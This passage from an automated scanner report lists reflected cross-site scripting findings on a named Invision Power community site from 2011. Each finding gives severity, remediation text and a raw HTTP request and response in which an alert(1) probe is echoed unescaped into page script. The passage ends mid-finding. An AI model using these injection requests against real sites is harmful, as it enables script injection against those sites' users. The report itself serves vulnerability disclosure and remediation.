Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:08:08 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8a369b3a7a3462aa407cc49d4fe33267; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:08:08 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:08:10 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:08:12 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrXOtDI0sjQzs7AwsDSwrgVcMFxcNwag; expires=Thu, 02-Feb-2012 23:08:12 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46180

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3935-sos31-improve-next-previous-issue-links-in-iptracker-v100/?8eb36"-alert(1)-"326757020f2=1";
       ipb.sharelinks.title = "(SOS31) Improve Next-Previous Issue links in IP.Tracker v1.0.0";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.39. http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3936-ipdownloads-file-version-in-support-topic-title/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 228af"-alert(1)-"3451a0f7ce6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=ac46a5f91ebbe68b20c4bad9616a198e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:54 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:55 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:56 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrPOtDI0sjQzs7AwMDS1rgVcMFxcNgae; expires=Thu, 02-Feb-2012 23:06:56 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 44635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3936-ipdownloads-file-version-in-support-topic-title/?228af"-alert(1)-"3451a0f7ce6=1";
       ipb.sharelinks.title = "IP.Downloads file version in support topic title";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.40. http://community.invisionpower.com/files/file/3937-peace/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3937-peace/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54fb5"-alert(1)-"94f3b1605b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:07:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=87bfd7d61ac44499caa74b4611ca9ede; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:07:17 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:07:18 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:07:20 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0NrfOtDI0sjQzs7AwMLawrgVcMFxcVwak; expires=Thu, 02-Feb-2012 23:07:20 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3937-peace/?54fb5"-alert(1)-"94f3b1605b0=1";
       ipb.sharelinks.title = "Peace";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.41. http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ec7"-alert(1)-"d8405c2df0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=21b812349bc4e0a64fc1a88e53d7af77; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:43 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:45 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:47 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0trDOtDI0sjQzs7AwMDC1rgVcMFxcUgaf; expires=Thu, 02-Feb-2012 23:06:47 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 45699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3938-turkish-turkce-language-pack-for-m31-videos-system-203-public-side/?c0ec7"-alert(1)-"d8405c2df0f=1";
       ipb.sharelinks.title = "Turkish / T.rk.e Language Pack for (M31) Videos System 2.0.3 (public side)";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.42. http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3939-vietnamese-3xx-lang/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 452cc"-alert(1)-"471a521f57a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3939-vietnamese-3xx-lang/?452cc"-alert(1)-"471a521f57a=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:07:02 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=fe0291a4b1037d3d3b5c18ad01340692; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:07:02 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:07:04 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:07:05 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0trTOtDI0sjQzs7AwMDK2rgVcMFxcZAag; expires=Thu, 02-Feb-2012 23:07:05 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 43634

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3939-vietnamese-3xx-lang/?452cc"-alert(1)-"471a521f57a=1";
       ipb.sharelinks.title = "Vietnamese 3.x.x lang";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.43. http://community.invisionpower.com/files/file/3940-dp31-ihost/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3940-dp31-ihost/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7300a"-alert(1)-"a151b03b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:56 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=646b6b288c61575cd993419c6b0d1b8a; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:56 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:56 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:57 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbDOtDI0sjQzs7AwMDS3rgVcMFvtBps%2C; expires=Thu, 02-Feb-2012 23:06:57 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 45875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3940-dp31-ihost/?7300a"-alert(1)-"a151b03b4b=1";
       ipb.sharelinks.title = "(DP31) iHost";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.44. http://community.invisionpower.com/files/file/3941-vanilla-valentine/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3941-vanilla-valentine/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18a46"-alert(1)-"12d2b2f2f27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8b7a1a276454ffaafa910c756ad6e0d5; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:37 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:38 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:40 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbTOtDI0sjQzszC3tLSwrgVcMFxcRwat; expires=Thu, 02-Feb-2012 23:06:40 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3941-vanilla-valentine/?18a46"-alert(1)-"12d2b2f2f27=1";
       ipb.sharelinks.title = "Vanilla Valentine";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.45. http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3942-sos31-file-version-in-online-list/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf855"-alert(1)-"7755996cd4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=c8dae556708fda16a70e1ba264087145; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:31 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:32 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:34 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbLOtDI0sjQzszC3tDSyrgVcMFxcRQao; expires=Thu, 02-Feb-2012 23:06:34 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 43952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3942-sos31-file-version-in-online-list/?bf855"-alert(1)-"7755996cd4f=1";
       ipb.sharelinks.title = "(SOS31) File Version in Online List";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.46. http://community.invisionpower.com/files/file/3943-speed/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3943-speed/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b7e3"-alert(1)-"7fa62b66d30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=ff77aa3002ae5ebe3b9da498e614ab3e; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:32 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:35 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:37 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbbOtDI0sjQzszC3tDSxrgVcMFxcWwar; expires=Thu, 02-Feb-2012 23:06:37 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 46479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3943-speed/?7b7e3"-alert(1)-"7fa62b66d30=1";
       ipb.sharelinks.title = "Speed";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.47. http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /files/file/3944-ipchat-12-turkish-language-pack/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9a9"-alert(1)-"dc3219cb2fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 23:06:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=1944fba0c751e2b21987bd8118d01990; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Tue, 02-Feb-2010 23:06:20 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Tue, 02-Feb-2010 23:06:23 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 23:06:24 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MrY0MbHOtDI0sjQzszC3tDC0rgVcMFxcXgao; expires=Thu, 02-Feb-2012 23:06:24 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 44007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
<script type="text/javascript">
       ipb.sharelinks.url = "http://community.invisionpower.com/files/file/3944-ipchat-12-turkish-language-pack/?7f9a9"-alert(1)-"dc3219cb2fe=1";
       ipb.sharelinks.title = "IP.Chat 1.2 Turkish Language Pack";
       ipb.sharelinks.bname = "Invision Power Services";
   </script>
...[SNIP]...

3.48. http://community.invisionpower.com/resources/documentation/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 455b5'><a>78f4a32a5a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

